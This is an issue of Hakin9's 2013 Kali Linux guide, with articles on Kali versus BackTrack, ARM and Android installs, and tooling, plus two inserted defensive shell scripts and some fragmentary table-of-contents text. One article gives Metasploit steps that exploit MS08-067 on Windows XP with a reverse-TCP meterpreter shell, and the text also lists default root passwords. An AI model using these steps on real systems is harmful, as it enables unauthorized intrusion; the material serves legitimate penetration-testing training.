Dear Readers,

Along with the autumn comes the comprehensive 'Guide to Kali Linux'. In the following issue we will focus on this popular, yet still-much-to-discover pentesting tool.

We will start with the Basics and see what's new in Kali Linux compared to BackTrack, and we will also browse the set of new and updated tools in the article 'Kali Linux for Enterprises'.

The Attack section is full of great tips for pentesters (and not only), showing how to weaponize the Android platform and also how attacks on servers are performed.

The Defense section contains a great paper on deploying network vulnerability scanners for medical clients and presents an interesting view on Kali scanning. There is also a fine overview of Kali as a tool for both good and bad purposes.

We are sure you will find a lot of helpful information in the whole issue.

Hakin9's Editorial Team would like to give special thanks to the authors, betatesters and proofreaders.

We hope our effort was worthwhile and you will find the Hakin9 Guide to Kali Linux issue appealing. We wish you a nice read!

Julia Adamczewska
and the Hakin9 team
com), is also one of the most popular Ubuntu Linux based platforms, with a collection of organized security testing tools such as OpenVAS, Maltego, Metasploit Framework (MSF), etc. The last release in the Backtrack series was Backtrack 5 R2, codename Revolution. Kali Linux is the latest Linux distribution made for penetration testing by and used by security assessors and hackers. Kali Linux is also considered a successor to Backtrack.
smartphone to create an invincible penetration-testing weapon.

Kali Linux, Attacking Servers    24

By Ismael Gonzalez D., Security Researcher, CEH, MCP, MCDTS, MCSA, LPIC-1
This article will show you how to perform attacks on web servers, getting full access to the system and database, just by using some of the 'Top Ten' tools of Kali Linux.

Hands On: How to Create a "Backdoor" for Remote Access with Kali Linux, DNS Spoofing Attack with Ettercap and Cloning Sites with Kali Linux    28

By Rafael Fontes Souza, Co-Founder at Grey Hats, member of the "French Backtrack Team"
The three articles describe very useful tools in Kali and cover the ideas of creating a backdoor, how to perform the spoofing attack and how to clone websites with SET.

DEFENSE

Kali Scanning for HIPAA - A Proof of Concept: using Kali Linux to deploy distributed network vulnerability scanners for medical clients    34

By Charlie Waters, Security Officer and Senior Consultant for Infinity Network Solutions
The Health Insurance Portability and Accountability

dle electronic Protected Health Information (e-PHI) to take action and reduce risk relative to potential security breaches of digital communication and storage of patient information. Open Source solutions can be leveraged as a low-cost and effective strategy to minimize risk when used as a component of a larger information security program. With a long "track" record of community support, Kali is an open source Linux distribution containing many security tools to meet the needs of

By Deepanshu Khanna, Linux Security Researcher
Today is the world of technology and everyone is somehow attached to it. Some are using technology for good purposes and some are using it for bad purposes, and the Internet is one of those technologies which defines both my statements. The Internet is being used both by the good (the White Hats) and the bad (the Black Hats). So, my paper is totally based on the above line: that the OS (Operating System) Kali Linux (which is an extension of Backtrack) can be used in both ways, either for good or bad.
Kali Linux - What's new?

Kali Linux, released earlier in the year, is dubbed the most advanced penetration testing distribution ever. How does it compare to BackTrack, and what's the difference?

For some years BackTrack Linux has been the premier pen-test distribution. The newest pen-test distribution released by Offensive Security, which supersedes BackTrack, comes with some massive and welcome improvements. The biggest change from BackTrack is the move from Ubuntu Linux to Debian Wheezy Linux. The first thing I notice is that the installation is no longer launched by executing a script on the Desktop as it was with BackTrack, but is initiated by booting into a proper Debian installation system. The process generally feels a lot smoother from the start. I have also noticed that in general Kali doesn't break as easily as BackTrack and it generally has a much more stable feel to it. So what's the difference between BackTrack and Kali?

BackTrack 5 v Kali

Ubuntu, which BackTrack is based on, has a general feel to it that it is trying to babysit you as the user, which can be annoying to an experienced Linux user. Ubuntu likes to make everything user friendly and tries to cut out any complex configurations. Debian, which Kali is based on, may not come across as so 'user friendly' to someone who is not that experienced with Linux, and requires more hands-on experience with Linux, but is generally more configurable and stable. Personally, I definitely prefer the Debian base for Kali as I like to tweak. This distribution is not for Linux beginners in any case.

What Happened to Firefox?

One of the first things I notice is that Firefox has been replaced by Iceweasel. On first instance this might leave you wondering what Iceweasel is and why it has replaced Firefox. The truth is that Iceweasel IS Firefox. The Debian project patches Iceweasel by backporting security fixes, thus making it secure enough to be declared in Debian stable. Because this is the case they had to re-brand it Iceweasel, as the modifications made by the Debian project were not approved by the Mozilla Foundation in order to use the Thunderbird logo. Other than backported security patches and the logo, both Firefox and Iceweasel are identical. I would recommend staying with Iceweasel on Debian, but if you really want to use Firefox you can install it in the following manner by first uninstalling Iceweasel (Listing 1).

FHS-compliance and /pentest

Another massive step in the right direction is FHS-compliance. File Hierarchy Standard (FHS) compliance specifies guiding principles for each part of the file system, and means that the directory structure and file system is standardised such that software and users can easily find the location of installed files such as binaries and libraries. This will also lead to a more stable system in general.

Hakin9 Extra 03/2013

In BackTrack, for every pen-test tool which you wanted to use you either had to give the full pathname to the tool, e.g. /pentest/passwords/rainbowcrack/rcrack, or change to its directory in order to use it. Kali no longer uses the /pentest directory tree, and all command line pen-test tools seem to be located in /usr/bin. Pen-test tools are now in PATH and can be fired up from anywhere in the system. I certainly don't miss the /pentest directory. This certainly makes life a whole lot easier.

No Nessus

Nessus does not come installed with Kali and is not available in the Kali repositories. One reason for this could be that Kali Linux is based on Debian Wheezy (Debian 7); however, if you check the available downloads from the Tenable website, they have only released a version of Nessus for version 6 of Debian. Another reason for this may be that Nessus is more of an audit and compliance benchmarking tool than a pen-test tool, and perhaps it was thought too bloated to include. Nessus is certainly something I see more often installed on dedicated servers these days. However, if you want to install it, the Debian 6 version of Nessus which can be downloaded from the Tenable website will still work. The only other possible reason for not including Nessus is that Nessus is forbidden in the Penetration Testing with BackTrack (PWB) course (which will probably get a new name now because of Kali). Offensive Security encourages all of its PWB students to use more specialised and targeted tools to perform enumeration and discovery. Further, different tools quite often output different results, so it's best to use more highly targeted tools in a pen-test to get specific results rather than the results of a generalised scan or vulnerability assessment tool such as Nessus.

Listing 1. How to install Firefox

echo "deb http://downloads.sourceforge.net/project/ubuntuzilla/mozilla/apt all main" >> /etc/apt/sources.list
apt-get remove iceweasel
apt-key adv --recv-keys --keyserver keyserver.ubuntu.com C1289A29
apt-get update
apt-get install firefox-mozilla-build
apt-get install thunderbird-mozilla-build

Other Notable Changes

Kali uses Leafpad instead of gedit, which is a much lighter weight text editor than gedit. It is also noticeably faster. But if you want to use gedit it is still available in the Kali repository with a simple apt-get install gedit. Gedit may appear bloated to some unless you are interested in syntax highlighting. Personally I like syntax highlighting, but have a habit of writing all my code in vim from the terminal window, which has this functionality anyway - each to their own I guess. Here's a list of some other welcome changes:

• The PDF viewer which was used in BackTrack has now been replaced with Document Viewer, which is great since I found the PDF viewer a bit flaky.

• You can now easily create your own custom ISO of Kali by using Debian live-build scripts.

• Kali comes with VLC player pre-installed, which was not included in BackTrack.

• I've also noticed that the ISO image for Kali is almost 1GB smaller than the BackTrack 5 R3 ISO.



On the Web

• http://www.pathname.com/fhs/ - Information on File Hierarchy Standard

• http://www.offensive-security.com/information-security-training/penetration-testing-with-backtrack/ - Penetration Testing with Backtrack Course



Summary

In summary, Kali Linux feels a lot smoother to work with than BackTrack, whilst most of the tools remain fairly similar or unchanged; the main overhaul to be commended is the overall improvement in the quality of the distribution from the move to Debian. It now feels like a complete distribution with far less flakiness and a lot more stability. For a deep dive into the pen-test tools which ship with Kali, I would recommend doing Offensive Security's Penetration Testing with BackTrack (PWB) course, which will familiarise you with all the tools necessary to conduct a complete penetration test with reporting. The main advantage you will notice is that the tools are now all in PATH with Kali. The only advice I have in pursuing this course is to get permission from your other half, as it will take a good couple of months out of your life, but it is extremely fun, addictive, and rewarding with all the breakthroughs you will have. Well done to the Offensive Security Team for creating such an improved distribution, and good luck with your Kali experience.



Upgrading to Future versions of Kali

If you had BackTrack 4 installed and wanted to upgrade to BackTrack 5, the only way you could have achieved this was to do an entire reinstall. This would be time consuming, and mean you would have to re-configure everything back to the way you wanted it, and customise all your tools again. With Kali however, an upgrade to future major releases can be done by simply issuing the commands in Listing 2.

The Kali repository gets its security packages from the Debian repository, and all of its tools are now packaged up to be Debian compliant.

Listing 2. Upgrading Kali to the next major distribution

root@kali:~# apt-get update
root@kali:~# apt-get dist-upgrade



STEVEN MCLAUGHLIN

Steven McLaughlin is an experienced information and network security professional. With both a technical and consulting background, he has been heavily in-
BASICS

KALI Linux For Enterprises

Whenever we think of Penetration Testing (PT) the first name that comes to our mind is "Backtrack (BT)", which we have been using for the last few years. Backtrack, funded by Offensive Security (www.offensive-security.com), is also one of the most popular Ubuntu Linux based platforms, with a collection of organized security testing tools such as OpenVAS, Maltego, Metasploit Framework (MSF), etc. The last release in the Backtrack series was Backtrack 5 R2, codename Revolution.

Kali Linux is the latest Linux distribution made for penetration testing by and used by security assessors and hackers. Kali Linux is also considered a successor to Backtrack. Backtrack was based on the Ubuntu distribution (www.ubuntu.com) whereas Kali Linux complies with Debian development standards (www.debian.org).

Building Kali Linux was something like re-inventing the wheel. Kali Linux was built from scratch, to be supported on the Debian platform and also to make it compatible with new or existing security tools. Kali Linux is designed to support both 32-bit and 64-bit platforms and the ARM architecture.

Figure 1. Evolution of Kali Linux: Back Track (BT)-4 R2, Back Track (BT)-5 R1 & R2 codename "Revolution", Kali-Linux

Evolution of Kali Linux

Backtrack was initially developed by Offensive Security with the aim of conducting network based Vulnerability Assessment and Penetration Testing. They started releasing BT versions with their own names, as depicted in Figure 1. BT 3 was released with codename "Whydah" and added functionality and tools to conduct wireless testing. BT 4 was released with codenames "Pwnsauce" and "Nemesis", with added functionality for web application testing and a more advanced and improved GUI based interface. This continued with BT 5 R2, with security tool updates like BeEF (Browser Exploitation Framework), bluelog, dnschef, dpscan, etc.

Kali Linux is considered an enterprise ready solution, because it considered enterprise users when it was designed. Kali runs on a Debian platform, which supports many software repositories to keep updating the OS with the latest releases and patches. This capability reduces the updating problems which users were facing in the BT environment.

Also, Offensive Security teamed up with Rapid7 (makers of the Metasploit Framework) to provide official support to Kali Linux. So MSF (the most important arsenal of BT) was rebuilt to support the Debian platform.
Development Architecture

Kali Linux supports various Reduced Instruction Set Computing (RISC) based development architectures. Kali ARM images can be made for:

• EfikaMX
• Beaglebone Black
• CuBox
• Galaxy Note 10.1
• Samsung Chromebook
• MK/SS808
• ODROID U2
• Raspberry Pi
• ARM Chroot

Let's discuss here a few of them, and how these ARM boards can be used for Kali Linux.

EfikaMX

Efika is a line of power efficient ARM architecture and Power architecture boards. The Efika MX Open Client is a network computer based around the Efika MX micro motherboard. EfikaMX has the following specifications:

• Freescale i.MX515 (ARM Cortex-A8 800MHz)
• 3D Graphics Processing Unit
• 512 MB RAM
• 8GB USB
• 2x USB 2.0 ports
• Audio jacks for headset
• Built in Speaker
• Bluetooth (Broadcom 2043)

Steps to build image for EfikaMX

• Step 1: Get an 8GB micro SD card, class 10 highly recommended
• Step 2: Download the Kali image
• Step 3: Use the dd utility to image this file to the SD card

root@kali:~# dd if=kali-1.0.1-efimx.img of=/dev/sdb bs=512k

Beaglebone Black

Beaglebone boards are tiny computers with all the capability of today's desktop machine without the bulk, expense or noise. Steps to build image using Beaglebone:

• Step 1: Get an 8GB micro SD card, class 10 highly recommended
• Step 2: Download the Kali Linux Beaglebone image
• Step 3: Use the dd utility to image this file to the SD card

root@kali:~# dd if=kali-bbb.img of=/dev/sdb bs=512k



Samsung Galaxy Note 10.1

Of course this is the popular one and most people have it, which also attracts pentesters to build an image for it. Kali also listed its procedure to make an image for the Galaxy Note 10.1. The Galaxy Note 10.1 has the following specification:

• 1.4 GHz quad-core processor
• 2 GB RAM

Steps to build image for Samsung Note (steps as per the Kali Linux.org website)

• Step 1: Get an 8GB micro SD card
• Step 2: Root the Samsung Galaxy Note 10.1
• Step 3: Download Kali Linux for Samsung Galaxy Note 10.1
• Step 4: Rename the image to linux.img
• Step 5: Download the Recovery.img file from the download section of Kali Linux.org and copy it onto your Note 10.1 SD card
• Step 6: Use the dd utility to image this file to the SD card

root@kali:~# dd if=/dev/block/mmcblk0p6 of=recovery.img_orig

• Step 7: Reboot the Galaxy Note 10.1 into recovery mode: press Power Off and the Volume Up button. Once you see the text "Samsung Galaxy Note 10.1", release the power button but keep pressing the Volume Up button. This should boot into Kali and auto-login into Gnome. The root password is "Changeme"
• Step 8: Open the keyboard: Applications -> Universal Access -> Florence Virtual Keyboard

Note: development architecture referenced from http://docs.kali.org/category/armel-armhf.
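The dd steps above hand a raw image straight to the SD card device; the two usual ways this goes wrong are a corrupted or tampered download and pointing of= at the wrong disk. The POSIX shell script below is an added example, not from the article or the Kali project: it verifies the image against a sha256sum-format checksum file (assumed to be downloaded beside the image), refuses a target that is mounted or not flagged removable by the kernel, and only then runs the same dd command; the image and checksum file in the demo are constructed.

```shell
#!/bin/sh
# Added example (not part of the article): guard the "dd the image to the SD
# card" step used for the EfikaMX, Beaglebone Black and Galaxy Note builds.
# Assumptions: a checksum file in sha256sum format sits beside the image, and
# the target is a whole block device (e.g. /dev/sdb) listed under /sys/block.
# File names used in demo_verify are constructed for the demo.

# verify_image IMG SUMFILE -> 0 if SUMFILE holds a matching SHA256 for IMG
verify_image() {
    img=$1; sums=$2
    name=$(basename "$img")
    # sha256sum lines look like "<hash>  file" or "<hash> *file" (binary mode)
    expected=$(awk -v f="$name" '$2 == f || $2 == "*" f { print $1; exit }' "$sums")
    if [ -z "$expected" ]; then
        echo "no checksum for $name in $sums" >&2
        return 1
    fi
    actual=$(sha256sum "$img" | awk '{ print $1 }')
    [ "$actual" = "$expected" ]
}

# is_mounted DEV -> 0 if DEV or one of its partitions is currently mounted
is_mounted() {
    grep -q "^$1" /proc/mounts 2>/dev/null
}

# is_removable DEV -> 0 if the kernel flags the whole device as removable media
is_removable() {
    flag="/sys/block/${1#/dev/}/removable"
    [ -r "$flag" ] || return 1
    [ "$(cat "$flag")" = "1" ]
}

# safe_flash IMG SUMFILE DEV -> writes IMG to DEV only when every check passes
safe_flash() {
    img=$1; sums=$2; dev=$3
    if ! verify_image "$img" "$sums"; then
        echo "checksum mismatch: refusing to write $img" >&2; return 1
    fi
    if is_mounted "$dev"; then
        echo "$dev is mounted: refusing to overwrite it" >&2; return 1
    fi
    if ! is_removable "$dev"; then
        echo "$dev is not removable media (system disk?): refusing" >&2; return 1
    fi
    echo "writing $img to $dev"
    dd if="$img" of="$dev" bs=512k && sync
}

# demo_verify -> 0 when verification accepts an intact constructed image and
# rejects the same file after a byte is appended (a corrupted download)
demo_verify() {
    d=$(mktemp -d)
    printf 'constructed fake image contents\n' > "$d/kali-demo.img"
    ( cd "$d" && sha256sum kali-demo.img > kali-demo.img.sha256sum )
    verify_image "$d/kali-demo.img" "$d/kali-demo.img.sha256sum" || return 1
    printf 'x' >> "$d/kali-demo.img"
    if verify_image "$d/kali-demo.img" "$d/kali-demo.img.sha256sum"; then
        return 1
    fi
    rm -rf "$d"
}

# With a real download: safe_flash kali-1.0.1-efimx.img kali-1.0.1-efimx.img.sha256sum /dev/sdb
demo_verify && echo "checksum verification behaves as expected"
```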

Directory Structure

As Kali is the successor to Backtrack, most of its features are inherited from Backtrack. Like Backtrack, Kali tools are also divided into 12 categories (Figure 2):

• Information Gathering
• Vulnerability Analysis
• Web Applications
• Password Attacks
• Wireless Attacks
• Stress Testing
• Exploitation Tools
• Sniffing/Snooping
• Maintaining Access
• Reverse Engineering
• Forensics
• Reporting Tools

Figure 2. Directory Structure

Figure 3. Kali Vs. Backtrack: Change in Directory Structure

Figure 4. Kali Linux "Top 10 Security Tools"

Remembering Backtrack 5, penetration testing directories were organized under the /pentest directory. But Kali Linux doesn't store security tools under a pentest directory; commands are generally executed from /usr/sbin (Figure 3).

Another important category of tools added in Kali Linux is the "Top 10 Security Tools", which are frequently used by pentesters, as presented in Figure 4.

Offensive Security has also put lots of effort into making Kali an enterprise ready solution by adding more tools to Kali. Researchers most of the time used Backtrack for "MSF" and, to do other stuff, they depended on other penetration testing distros or made their own ISO or installed on their own operating system. Figure 5 shows the comparison between Backtrack and Kali.
Let's do some Practical things with Kali

As we know the famous vulnerability in Windows XP: "MS08-067: Vulnerability in Server Service could allow Remote Code Execution".

Some Brief about the vulnerability

A remote code execution vulnerability exists in the Server service on Windows systems. The vulnerability is due to the service not properly handling specially crafted RPC requests. An attacker who successfully exploited this vulnerability could take complete control of an affected system.

Reference to the vulnerability

http://technet.microsoft.com/en-us/security/bulletin/ms08-067
Figure 7. Searching exploits for netapi

System Exploited successfully: Windows XP Service Pack 2.

Steps followed to exploit the vulnerability (Figures 6-9), explained in a nutshell.

Step 1: Open MSF Console

msfconsole




Figure 8. Setting up exploit, adding required variables, and exploiting the target

Figure 9. Verifying exploited system
Step 2: Search for the exploit "netapi", using the command "search netapi"

Step 3: Configure the exploit for execution against the target. Use the following commands to exploit the target:

• use exploit/windows/smb/ms08_067_netapi
• set payload windows/meterpreter/reverse_tcp
• set lhost <your machine IP>
• set rhost <Remote IP>
• exploit

Step 4: Exploit runs successfully; run VNC

Kali Linux installation and Software repositories

Installation

• Download VMware Player or VMware Workstation from the VMware website as per your operating system
• Install VMware Player or VMware Workstation on your platform
• Create a virtual machine (with min 20 GB hard disk space, 1GB RAM, two network adapters, rest all by default)
• Mount the Kali ISO file in the VMware settings
• Switch on the virtual machine and boot it from "CD-ROM" by pressing "ESC"
• Once GRUB appears, click on Install (or it can be used as a Live CD)
• Follow the instructions as written on screen (similar to the Backtrack installation)
• Finish the installation

Update Kali

• Open leafpad
• Open the file /etc/apt/sources.list (some source paths are already present there, but more can be added from Google)
• apt-get update
• apt-get upgrade
• apt-get dist-upgrade
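The Update Kali steps above, like Listing 1 in the 'Kali Linux - What's new?' article, add repository lines to /etc/apt/sources.list by hand, and every non-official line is a host you are trusting to supply packages to a root-run apt-get. The POSIX shell script below is an added example, not from either article or the Kali project: it classifies each entry as official (assumed official hosts: http.kali.org and security.kali.org), third-party over HTTPS, third-party over plain HTTP, or malformed, and counts the entries that need a deliberate trust decision; the sources.list it audits is a constructed sample.

```shell
#!/bin/sh
# Added example (not part of the article): audit /etc/apt/sources.list style
# entries before running apt-get update / upgrade / dist-upgrade.
# Assumption: the hosts below are the official Kali mirrors; any other host is
# treated as a third-party repository that needs a deliberate trust decision.
OFFICIAL_HOSTS="http.kali.org security.kali.org"

# host_of URL -> prints the host part of a repository URL
host_of() {
    printf '%s\n' "$1" | sed -e 's|^[a-z]*://||' -e 's|/.*$||'
}

# classify_line LINE -> prints one of:
#   comment, official, third-party, insecure-third-party, malformed
classify_line() {
    entry=$1
    case "$entry" in
        '' | '#'*) echo comment; return 0 ;;
    esac
    set -- $entry                          # split the entry into fields
    [ $# -ge 2 ] || { echo malformed; return 0; }
    kind=$1; shift
    case "$1" in "["*) shift ;; esac       # skip an optional [options] field
    url=${1:-}
    case "$kind" in
        deb | deb-src) ;;
        *) echo malformed; return 0 ;;
    esac
    [ -n "$url" ] || { echo malformed; return 0; }
    host=$(host_of "$url")
    for h in $OFFICIAL_HOSTS; do
        if [ "$host" = "$h" ]; then echo official; return 0; fi
    done
    case "$url" in
        https://*) echo third-party ;;
        *) echo insecure-third-party ;;    # plain http or unknown scheme
    esac
}

# audit_sources FILE -> prints one report line per active entry
audit_sources() {
    while IFS= read -r entry || [ -n "$entry" ]; do
        verdict=$(classify_line "$entry")
        case "$verdict" in
            comment) ;;
            official) printf 'OK    %s\n' "$entry" ;;
            *) printf 'WARN  [%s] %s\n' "$verdict" "$entry" ;;
        esac
    done < "$1"
}

# count_flagged FILE -> prints the number of entries that are not official
count_flagged() {
    n=0
    while IFS= read -r entry || [ -n "$entry" ]; do
        case "$(classify_line "$entry")" in
            comment | official) ;;
            *) n=$((n + 1)) ;;
        esac
    done < "$1"
    echo "$n"
}

# write_sample FILE -> writes a constructed sources.list (not a real Kali file)
write_sample() {
    cat > "$1" <<'EOF'
# constructed sample for the demo
deb http://http.kali.org/kali kali main non-free contrib
deb-src http://http.kali.org/kali kali main non-free contrib
deb http://downloads.sourceforge.net/project/ubuntuzilla/mozilla/apt all main
deb [arch=amd64] https://example.invalid/repo stable main
EOF
}

sample=$(mktemp)
write_sample "$sample"
audit_sources "$sample"
echo "non-official entries: $(count_flagged "$sample")"
rm -f "$sample"
```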

Summary

Kali Linux is a Debian based platform for advanced penetration testing. The Kali approach is a good try at stepping ahead into the next generation of penetration testing. Researchers and developers of Offensive Security have put their best effort into making the Kali platform enterprise ready. As Debian is the older platform for Linux, it also has a large user base compared to Ubuntu. Debian based operating systems also have good market capture, so the movement from the Ubuntu to the Debian platform will definitely give power to end users.

At last, Kali is enterprise focused, developed keeping in mind enterprise needs, so there is much more to evolve in the near future. So good luck to the Offensive Security team!

Keep Learning and Be Secure!



ATTACK

Weaponization of Android Platform using Kali Linux

Kali Linux has become the most popular tool for professional penetration testing and security auditing. In this article, we will review how to couple the functionality of Kali Linux with the Android platform over an HTC One X smartphone to create an invincible penetration-testing weapon.

The global market is flooded, ruled by Android-based mobile devices and smartphones. Mobile phones are becoming smaller and have greater processing power. These devices with mobile internet and wireless connectivity have revolutionised businesses and work methodologies. Tasks like connectivity, sharing, process automation and extensive computing over smartphones have become the norm. The Android operating system has made smartphones and mobile devices a very powerful tool in the hands of security professionals and even deadlier in the hands of black hats.

Android is a very popular operating system for mobile devices such as smartphones and tablets. It was initially developed by Android Inc. and then bought by Google in 2005. Android is an Open Handset Alliance product and released under the Apache license. The power of the Android platform lies in the thousands of apps running on it, backed by a strong and active open source developer community. It is used by 70% of the mobile developer community, thus making it the most widely used platform. It is considered a highly customisable and scalable mobile-based distribution, making it a widely accepted foundation base for community-driven mobile projects.

Android Architecture Overview

Android devices are built on Linux kernel version 2.6, and the first commercial distribution was made available on the HTC Dream handset in 2008. Since then numerous updates have incrementally improved the operating system base and added new and improved functionality. The latest official release is Jelly Bean 4.3 with the slogan "An even sweeter Jelly Bean". Android's user interface uses touch inputs to correspond to real world actions. These responses are immediate, with vibration and haptic feedback capabilities. The Android framework is very extensive as it has a layered approach. It has five layers: the kernel and low-level tools, the native libraries, the Android runtime with the Dalvik virtual machine, the framework layer on top of this, and finally the applications, which run above everything.

The Linux kernel is written in C/C++ and the framework is written in Java and runs on the Dalvik virtual machine. The present kernel is 3.0.x and has added support for Bluetooth and Wi-Fi encryption. Android is built to run on devices with little main memory and low powered CPUs. The majority of the modules are made to consume low power. The actual Android runtime consists of the Dalvik virtual machine and Java libraries. All applications on Android devices run in their own sandboxed Dalvik virtual machines. Each application runs with its own unique user id and in its own process. Android has very efficient memory and power management. Android has support for various APIs, has a media framework, integrated internet browser support, highly optimised graphics, camera, GPS, compass, and accelerometer sensors. Applications can be easily created using SDKs and are available from the various app markets. The biggest app market is Google Play, where one can find various apps by category and by searching. Apart from the default Google Play, there are many other app stores to download and install apps from. Table 1 provides a list of widely used open markets, but make sure not to trust anyone blindly in the present scenario of malicious apps and malware threats. Always disable USB debugging and uncheck the "Unknown sources" option under the Settings » Applications menu to keep your Android device safe from such tampering (Figure 1 and Table 1).

Table 1. List of available Android App Stores

Sl#  Apps Market     Url
01   Google Play     https://play.google.com/store?hl=en
02   Amazon store    http://www.amazon.com/mobile-apps/
03   GetJar          http://www.getjar.mobi/
04   SlideMe         http://slideme.org/
05   F-Droid         https://f-droid.org/
06   Appoke          http://beta.appoke.com/
07   Appia           http://appia.com/
08   App Brain       http://www.appbrain.com/
09   AndroidPit      http://www.androidpit.com/
10   Handango        http://www.handango.com/Home.jsp?siteId=2218
11   Handster        http://www.handster.com/
12   Mobango         http://in.mobango.com/
13   Opera Store     http://apps.opera.com/en_in/
14   Socio           http://soc.io/
15   Insyde Market   http://www.insydemarket.com/
16   AppsFire        http://appsfire.com/
17   Aptoide         http://www.aptoide.com/

Figure 1. Android Architecture, taken from wiki
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Introduction to the HTC One X Mobile 
Phone 

The HTC One X smartphone is a pretty power- 
ful device with 1.5 GHz, quad core (global ver- 
sion) CPU speed, Android 4.1 with smart sense 
4, screen size of 1280x720 (HD, 720p) with 1GB 
RAM 16/24 GB Flash Memory and Wi-Fi, Blue- 
tooth, NFC, USB connectivity and multi-sensors 
(Gyro sensor, G-Sensor, Digital Compass, Proxim- 
ity sensor and Ambient light sensor). 

Introduction to Kali Linux 

Offensive Security the creators of Backtrack Linux 
have a new catchy tag line "the quitter you become, 
the more you are able to hear", with this Zen man- 
tra the focus is stealth. Kali Linux was created for 
stealth and attack, this amazing distribution is an 
advanced and more versatile version of Backtrack 
ever created. This distribution is geared towards 
professional penetration testers and security audi- 
tors. Kali has gone beyond any live cd distro and 
moved into the category of a full-fledged operat- 
ing system. It has moved to a solid base of Debi- 
an modules and is completely File Hierarchy Sys- 
tem (FHS) compliant. All directories appear under 
the main root directory 7", and have the ability to 
be stored and accessed on physical or virtual de- 
vices. The main 7pentest" directory from previous 
Backtrack5 release has been removed in this ver- 
sion named Kali. Now the user can execute any tool 
from anywhere in the file-system, irrespective of its 
installed location. The second advantage of Kali is 
its support for ARM hardware and ability to boot- 
strap the installation directly from the repositories. 

The Kali operating system has over three hundred penetration testing tools and wireless device support. Its kernel is highly patched and network services are disabled by default, making it more secure. Kali is not just for network security professionals; beginners can also start learning about cyber security using this distribution. Whether you are pentesting wireless, exposing server vulnerabilities, performing a web-application-based exploit, learning, or doing social engineering, Kali is the one-stop shop for all security needs. Kali is free and has now been ported to Android-based smartphones, so it can be taken anywhere.

Kali Linux has many well-known tools like Metasploit, injection-capable wireless drivers, Kismet, John, ZAP proxy, Nmap, Ophcrack, Ettercap, Hydra, etc. These tools are grouped into fifteen categories for various purposes: Top 10 Security Tools, Information Gathering, Vulnerability Analysis, Web Applications, Password Attacks, Wireless Attacks, Exploitation Tools, Sniffing/Spoofing, Maintaining Access, Reverse Engineering, Stress Testing, Hardware Hacking, Forensics, Reporting Tools and System Services. Kali Linux runs Debian with XFCE and comes with vim as the default text editor. All the standard applications and accessories are pre-installed and ready to run. To weaponize the Android platform with Kali Linux, we will require an unlocked and rooted device.

How to Unlock the HTC One X Bootloader and Root the Device

It is important to understand the difference between unlocking the bootloader and rooting a mobile device. Unlocking the bootloader gives the user the option to replace the stock operating system on the device. Rooting, on the other hand, is the process of modifying the default operating system shipped with the device in order to gain complete control over it.

This means that the limitations carriers and manufacturers put on the device are easily bypassed, extended functionality is accessible without problems, and custom modules and upgrades can be added without restriction. Generally, manufacturers and carriers do not recommend rooting. HTC provides instructions on its website to unlock the bootloader of the HTC One X, but by performing this operation the user voids all warranty on the device. The step-by-step instructions to unlock the HTC One X bootloader are on the HTC Dev site. Make sure the HTC drivers are installed on the PC and that the phone is recognised as an HTC device over the USB cable. Once the device is connected successfully to the PC, log in to the HTC Dev website with the registered user name and password. Start by selecting Unlocking Your Bootloader, then select "All Other Supported Models" under the Supported Devices section and click Begin Unlock Bootloader to start the wizard.

Figure 2. Unlock Bootloader (HTC Dev "Unlocking Your Bootloader" page, Supported Devices section: HTC allows the bootloader to be unlocked for 2011 models going forward, cautions that damage resulting from unlocking the bootloader may not be covered under warranty, and notes that unlocking the bootloader does not unlock the SIM lock)

Figure 3. Warranty Void (HTC Dev Legal Terms page, Unlock Bootloader)

Hakin9 Extra 03/2013

Weaponization of Android Platform using Kali Linux

Figure 4. Linux Deploy (Properties screen with the Install, Reconfigure and Deploy options)

Figure 5. Click Install

Figure 6. Install finish

The website prompts you to sign a disclaimer that clearly states the warranty is void and that, from then on, every repair will be charged. The wizard finishes by requesting the device Token ID extracted from the phone. Based on the Token ID, HTC issues the unlock code that releases the device. The received "unlock.bin" file is used to flash the device, and the bootloader is unlocked. The next step is to install the SuperSU app, which is a root access management tool. With root privilege on the mobile device, Kali Linux can now be installed. There are two methods to install Kali Linux on Android:
• Method 01: Install Kali GUI using Linux Deploy App,
• Method 02: Install Kali Command Line Interface (CLI) using Chroot Environment.

Method 01: Install Kali GUI using Linux Deploy App

Requirements: Rooted HTC One X mobile with 4 GB free space, Linux Deploy app & Android VNC Viewer.

Methodology

• Install Linux Deploy and configure these values: Distribution=Kali Linux, Architecture=armel, VNC: Screen Width=1920, VNC: Screen Height=1280 (Figure 4-6),
• Scroll up and click Install to finish the download and installation of Kali Linux over Wi-Fi,
• After completion, go back to the Settings and select the Reconfigure option,
• Once reconfiguration is complete, run the server using the START option,
• Install Android VNC Viewer and configure these values: Nickname=Kali, Port=5900, Password=changeme, Color Options=4bpp better quality video (Figure 7-9).

Click on the Connect button to fire away; the Kali Linux GUI will show up. This method effectively shows how to deploy the Kali GUI on Android.

Optional 01

The Kali distribution can be updated by running the command below from a terminal prompt:

sudo apt-get update && sudo apt-get upgrade && msfupdate



Figure 7. Server started (Linux Deploy log: configuration updated, partitions mounted, SSH started)

Figure 9. Kali Linux booting

Figure 10. Extracted folder containing kali.img
Optional 02

The Armitage tool can also be added. Armitage is a scriptable front end for Metasploit that visualizes targets, recommends exploits and exposes the advanced post-exploitation features of the Metasploit framework. It has many features for discovery, access, post-exploitation and manoeuvre, which makes it more effective. The command to install Armitage is:

apt-cache search armitage && apt-get install armitage

Method 02: Install Kali Command Line Interface (CLI) using Chroot Environment

In this method the chroot operation is used to deploy Kali Linux. The chroot operation changes the root directory for the current running process and its child processes, creating and hosting a separate virtualised environment. Any program run through it is confined to the defined base directory. Here the chroot operation is used to set up the Kali Linux platform for pentesting.

Requirements

Rooted HTC One X mobile device with 6 GB free space, BusyBox free app & Terminal Emulator app.

Methodology

• Download the pre-compiled chroot Kali distribution from http://goo.gl/qmGle. Mirror: https://archive.org/details/Kali.nogui.armel.zitstif.chroot.4 820 13
  MD5: d60c5a52bcea35834daecb860bd8a5c7
  SHA1: f62c2633d214de9edad1842c9209f443bcea385d
• Extract the downloaded archive onto the phone's internal storage folder /sdcard/kali,
• The kali folder contains three files: hashsum, the 'kali' shell script and the 'kali.img' file (Figure 10),
• Install the Terminal Emulator app. To run the Kali chroot environment use the command below.

Figure 11. Kali chroot prompt

Figure 12. Metasploit in Kali chroot

*Note: the kali file requires executable permissions, which we set first with this command:

chmod 755 /sdcard/kali/kali

then use this command to run Kali:

su -c "cd /sdcard/kali && sh kali"
